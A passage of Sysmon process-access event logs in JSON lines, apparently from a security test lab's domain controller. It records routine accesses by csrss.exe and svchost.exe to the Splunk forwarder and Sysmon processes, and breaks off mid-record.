{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 